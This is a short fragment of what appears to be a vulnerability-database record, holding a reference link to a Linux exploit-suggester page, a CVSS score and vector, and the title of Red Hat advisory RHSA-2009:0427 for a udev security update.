"http://www.kitploit.com/2013/08/linux-exploit-suggester-grab-linux.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}
(RHSA-2009:0427) Important: udev security update
